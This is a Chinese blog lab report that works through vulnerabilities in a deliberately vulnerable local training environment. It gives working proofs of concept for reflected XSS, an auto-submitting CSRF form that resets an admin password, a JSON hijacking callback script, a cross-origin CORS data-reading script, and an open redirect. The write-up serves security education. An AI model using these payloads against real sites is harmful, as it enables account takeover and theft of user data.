<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha256-CTSx/A06dm1B063156EVh15m6Y67pAjZZaQc89LLSrU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.24/fancybox/fancybox.css" integrity="sha256-vQkngPS8jiHHH0I6ABTZroZk8NPZ7b+MUReOFE9UsXQ=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"gaifagafin.top","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.18.2","exturl":false,"sidebar":{"position":"right","display":"hide","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"bookmark":{"enable":true,"color":"#222","save":"manual"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":true,"nav":null},"stickytabs":true,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInUp","post_block":"fadeIn","post_header":"fadeIn","post_body":"fadeIn","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true}}</script><script src="/js/config.js"></script>

    <meta name="description" content="1. 挖掘环境中的反射型XSS漏洞，（以弹框 test13 证明） 2. 复现环境中的CSRF漏洞，设计表单，当管理员点击URL以后自动将自己的密码重置为：123456 3. 复现环境中JSON Hijacking漏洞，在另一个网站（或本机另一个端口）获取用户信息 4. 通过在服务器Web目录创建.htaccess文件，控制服务器响应头，实现CORS漏洞，在另一网站，接收HTML接   	  口的">
<meta property="og:type" content="article">
<meta property="og:title" content="前端漏洞靶场环境——front">
<meta property="og:url" content="https://gaifagafin.top/2023/11/27/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94front/index.html">
<meta property="og:site_name" content="gaifagafin&#39;s blog">
<meta property="og:description" content="1. 挖掘环境中的反射型XSS漏洞，（以弹框 test13 证明） 2. 复现环境中的CSRF漏洞，设计表单，当管理员点击URL以后自动将自己的密码重置为：123456 3. 复现环境中JSON Hijacking漏洞，在另一个网站（或本机另一个端口）获取用户信息 4. 通过在服务器Web目录创建.htaccess文件，控制服务器响应头，实现CORS漏洞，在另一网站，接收HTML接   	  口的">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://images.gaifagafin.top/202312011004731.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011004043.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011004158.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006537.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006796.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006632.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006613.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006338.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006841.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006191.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006727.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011006446.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011011335.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011007051.png">
<meta property="og:image" content="https://images.gaifagafin.top/202312011007821.png">
<meta property="article:published_time" content="2023-11-27T04:14:07.000Z">
<meta property="article:modified_time" content="2023-12-01T09:26:52.109Z">
<meta property="article:author" content="gaifagafin">
<meta property="article:tag" content="前端漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://images.gaifagafin.top/202312011004731.png">


<link rel="canonical" href="https://gaifagafin.top/2023/11/27/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94front/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://gaifagafin.top/2023/11/27/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94front/","path":"2023/11/27/前端漏洞靶场环境——front/","title":"前端漏洞靶场环境——front"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>前端漏洞靶场环境——front | gaifagafin's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">gaifagafin's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">26</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">12</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">27</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E8%A6%81%E6%B1%82"><span class="nav-text">实验要求</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA"><span class="nav-text">靶场搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B8%8E%E5%A4%8D%E7%8E%B0"><span class="nav-text">漏洞挖掘与复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8BXSS%E6%BC%8F%E6%B4%9E"><span class="nav-text">反射型XSS漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CSRF%E6%BC%8F%E6%B4%9E"><span class="nav-text">CSRF漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JSON-HiJacking%E6%BC%8F%E6%B4%9E"><span class="nav-text">JSON HiJacking漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CORS%E6%BC%8F%E6%B4%9E"><span class="nav-text">CORS漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#URL%E8%B7%B3%E8%BD%AC%E6%BC%8F%E6%B4%9E"><span class="nav-text">URL跳转漏洞</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="gaifagafin"
      src="/images/gaifagafin.jpg">
  <p class="site-author-name" itemprop="name">gaifagafin</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">26</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/gaifagafin" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;gaifagafin" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1454991831@qq.com" title="E-Mail → 1454991831@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
        <div class="pjax">
        </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://gaifagafin.top/2023/11/27/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94front/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/gaifagafin.jpg">
      <meta itemprop="name" content="gaifagafin">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="gaifagafin's blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="前端漏洞靶场环境——front | gaifagafin's blog">
      <meta itemprop="description" content="1. 挖掘环境中的反射型XSS漏洞，（以弹框 test13 证明） 2. 复现环境中的CSRF漏洞，设计表单，当管理员点击URL以后自动将自己的密码重置为：123456 3. 复现环境中JSON Hijacking漏洞，在另一个网站（或本机另一个端口）获取用户信息 4. 通过在服务器Web目录创建.htaccess文件，控制服务器响应头，实现CORS漏洞，在另一网站，接收HTML接   	  口的用户信息。 5. 挖掘环境中的URL跳转漏洞，构造请求，跳转到重邮官网">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          前端漏洞靶场环境——front
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-11-27 12:14:07" itemprop="dateCreated datePublished" datetime="2023-11-27T12:14:07+08:00">2023-11-27</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-12-01 17:26:52" itemprop="dateModified" datetime="2023-12-01T17:26:52+08:00">2023-12-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">漏洞</span></a>
        </span>
    </span>

  
</div>

            <div class="post-description">1. 挖掘环境中的反射型XSS漏洞，（以弹框 test13 证明） 2. 复现环境中的CSRF漏洞，设计表单，当管理员点击URL以后自动将自己的密码重置为：123456 3. 复现环境中JSON Hijacking漏洞，在另一个网站（或本机另一个端口）获取用户信息 4. 通过在服务器Web目录创建.htaccess文件，控制服务器响应头，实现CORS漏洞，在另一网站，接收HTML接   	  口的用户信息。 5. 挖掘环境中的URL跳转漏洞，构造请求，跳转到重邮官网</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="实验要求"><a href="#实验要求" class="headerlink" title="实验要求"></a>实验要求</h1><p>漏洞环境：前端漏洞靶场环境——front(系统有两个用户： user1&#x2F;user1 、admin1&#x2F;admin1)，要求提交实验报告</p>
<ol>
<li>挖掘环境中的反射型XSS漏洞，（以弹框 test13 证明）</li>
<li>复现环境中的CSRF漏洞，设计表单，当管理员点击URL以后自动将自己的密码重置为：123456</li>
<li>复现环境中JSON Hijacking漏洞，在另一个网站（或本机另一个端口）获取用户信息</li>
<li>通过在服务器Web目录创建.htaccess文件，控制服务器响应头，实现CORS漏洞，在另一网站，接收HTML接口的用户信息。</li>
<li>挖掘环境中的URL跳转漏洞，构造请求，跳转到重邮官网</li>
</ol>
<h1 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>靶场搭建</h1><p>进入靶场文件目录下输入<code>docker-compose up -d</code>启动靶场，访问<code>http://192.168.37.128:8983</code>即可</p>
<h1 id="漏洞挖掘与复现"><a href="#漏洞挖掘与复现" class="headerlink" title="漏洞挖掘与复现"></a>漏洞挖掘与复现</h1><h2 id="反射型XSS漏洞"><a href="#反射型XSS漏洞" class="headerlink" title="反射型XSS漏洞"></a>反射型XSS漏洞</h2><p>使用用户名user1与密码user1登录<img data-src="https://images.gaifagafin.top/202312011004731.png"></p>
<p>查看网站源码，发现参数<code>name</code>处可能存在XSS漏洞</p>
<p><img data-src="https://images.gaifagafin.top/202312011004043.png"></p>
<p>尝试构造PoC并发送，成功弹窗，证明存在反射型XSS漏洞</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">http://192.168.37.128:8983/front/info.php?name=<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="string">&#x27;test 13&#x27;</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img data-src="https://images.gaifagafin.top/202312011004158.png"></p>
<h2 id="CSRF漏洞"><a href="#CSRF漏洞" class="headerlink" title="CSRF漏洞"></a>CSRF漏洞</h2><p>抓包查看用户点击修改密码时发送给服务器的数据包，可以看到新密码<code>newpassword</code>和确认密码<code>passwordrepeat</code>都是用<strong>POST</strong>传参</p>
<figure class="highlight http"><table><tr><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/front/info.php?name=</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>192.168.37.128:8983</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>38</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>http://192.168.37.128:8983</span><br><span class="line"><span class="attribute">Sec-GPC</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>http://192.168.37.128:8983/front/info.php?name=</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>uid=dXNlcjE%3D; is_ad=1; PHPSESSID=ggoq5vok58252u9sdl3i043981</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"></span><br><span class="line"><span class="language-haxe"><span class="keyword">new</span><span class="type">password</span>=user1&amp;passwordrepeat=user1</span></span><br></pre></td></tr></table></figure>

<p>开启攻击机的网络服务，在攻击机的www目录下建立一个html页面(<code>192.168.137.1:8888/test.html</code>)，构造修改密码功能表单，一旦受害者访问此页面，密码就会被改成<code>123456</code>，构造表单如下</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">id</span>=<span class="string">&quot;myform&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">action</span>=<span class="string">&quot;http://192.168.37.128:8983/front/info.php?name=&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;newpassword&quot;</span> <span class="attr">value</span>= <span class="string">&quot;123456&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;hidden&quot;</span> <span class="attr">name</span>=<span class="string">&quot;passwordrepeat&quot;</span> <span class="attr">value</span>= <span class="string">&quot;123456&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- javascript自动提交 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> myform=<span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&quot;myform&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    myform.<span class="title function_">submit</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>使用无痕浏览模式打开新窗口模拟管理员登录后并”不小心”访问URL<code>192.168.137.1:8888/test.html</code>以后，页面会自动提交事先构造的表单，这时密码已经被修改，用之前的密码admin1登录管理员显示登陆失败</p>
<p><img data-src="https://images.gaifagafin.top/202312011006537.png"></p>
<p>使用修改后的密码123456可以成功登录admin1账号</p>
<p><img data-src="https://images.gaifagafin.top/202312011006796.png"></p>
<h2 id="JSON-HiJacking漏洞"><a href="#JSON-HiJacking漏洞" class="headerlink" title="JSON HiJacking漏洞"></a>JSON HiJacking漏洞</h2><p>使用user1账号登录，发现返回敏感信息，可能存在Hijacking漏洞</p>
<p><img data-src="https://images.gaifagafin.top/202312011006632.png"></p>
<p>构建PoC，将代码放入构建的web服务器目录下(<code>http://192.168.137.1:8888/test.html</code>)</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript">  </span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">function</span> <span class="title function_">hijack</span>(<span class="params">result</span>)</span></span><br><span class="line"><span class="language-javascript">    &#123;  </span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">alert</span>(result);</span></span><br><span class="line"><span class="language-javascript">    &#125;  </span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>  </span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;http://192.168.37.128/userdata.php?callback=hijack&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span> </span><br></pre></td></tr></table></figure>

<p>使用admin1账户登录模拟管理员访问192.168.137.1:8888&#x2F;test.html，但是页面返回null</p>
<p><img data-src="https://images.gaifagafin.top/202312011006613.png"></p>
<p>如果web服务器构建在同一IP地址下，访问<code>192.168.37.128/test.html</code>，查看响应头，可以查看到敏感信息</p>
<p><img data-src="https://images.gaifagafin.top/202312011006338.png"></p>
<h2 id="CORS漏洞"><a href="#CORS漏洞" class="headerlink" title="CORS漏洞"></a>CORS漏洞</h2><p>使用user1账户登录，点击个人信息html接口，返回敏感信息并且发现响应头存在<code>Access-Control-Allow-Origin: *</code>,存在CORS漏洞</p>
<p><img data-src="https://images.gaifagafin.top/202312011006841.png"></p>
<p>构建PoC，将代码放入构建的web服务器目录下(<code>http://192.168.137.1:8888/test.html</code>)</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript">  </span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> req = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>(); </span></span><br><span class="line"><span class="language-javascript">    req.<span class="property">onload</span> = reqListener; </span></span><br><span class="line"><span class="language-javascript">    req.<span class="title function_">open</span>(<span class="string">&#x27;get&#x27;</span>,<span class="string">&#x27;http://192.168.37.128:8983/front/cors.php&#x27;</span>,<span class="literal">true</span>); </span></span><br><span class="line"><span class="language-javascript">    req.<span class="property">responseType</span>=<span class="string">&quot;text&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">reqListener</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">    &#123; </span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (req.<span class="property">readyState</span> === req.<span class="property">DONE</span>)</span></span><br><span class="line"><span class="language-javascript">        &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span>(req.<span class="property">status</span> === <span class="number">200</span>)</span></span><br><span class="line"><span class="language-javascript">            &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="title function_">write</span>(req.<span class="property">responseText</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125; </span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    req.<span class="title function_">send</span>(<span class="literal">null</span>);</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span> </span><br></pre></td></tr></table></figure>

<p>访问<code>192.168.137.1:8888/test.html</code>，成功跨域获取敏感信息</p>
<p><img data-src="https://images.gaifagafin.top/202312011006191.png"></p>
<h2 id="URL跳转漏洞"><a href="#URL跳转漏洞" class="headerlink" title="URL跳转漏洞"></a>URL跳转漏洞</h2><p>使用user1账户登录，点击<code>返回登录页</code>，使用burpsuite抓包，发现存在url跳转</p>
<p><img data-src="https://images.gaifagafin.top/202312011006727.png"></p>
<p>将url改成<code>www.cqupt.edu.cn</code></p>
<p><img data-src="https://images.gaifagafin.top/202312011006446.png"></p>
<p>发现重定向到网站目录下</p>
<p><img data-src="https://images.gaifagafin.top/202312011011335.png"></p>
<p>将url改写成<code>//www.cqupt.edu.cn</code>，点击关注重定向</p>
<p><img data-src="https://images.gaifagafin.top/202312011007051.png"></p>
<p>成功跳转到重邮官网</p>
<p><img data-src="https://images.gaifagafin.top/202312011007821.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>gaifagafin
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://gaifagafin.top/2023/11/27/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94front/" title="前端漏洞靶场环境——front">https://gaifagafin.top/2023/11/27/前端漏洞靶场环境——front/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/%E5%89%8D%E7%AB%AF%E6%BC%8F%E6%B4%9E/" rel="tag"># 前端漏洞</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/12/02/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%8E%AF%E5%A2%83%E2%80%94%E2%80%94logic/" rel="prev" title="逻辑漏洞靶场环境——logic">
                  <i class="fa fa-angle-left"></i> 逻辑漏洞靶场环境——logic
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/11/24/%E8%AE%B0%E4%B8%80%E6%AC%A1vimwiki%E5%AE%89%E8%A3%85%E5%8F%8Avim-markDown%E7%9A%84%E4%BD%BF%E7%94%A8/" rel="next" title="记一次vimwiki安装及vim markDown的使用">
                  记一次vimwiki安装及vim markDown的使用 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">gaifagafin</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/next-theme-pjax/0.6.0/pjax.min.js" integrity="sha256-vxLn1tSKWD4dqbMRyv940UYw4sXgMtYcK6reefzZrao=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.24/fancybox/fancybox.umd.js" integrity="sha256-oyhjPiYRWGXaAt+ny/mTMWOnN1GBoZDUQnzzgC7FRI4=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script><script src="/js/pjax.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>

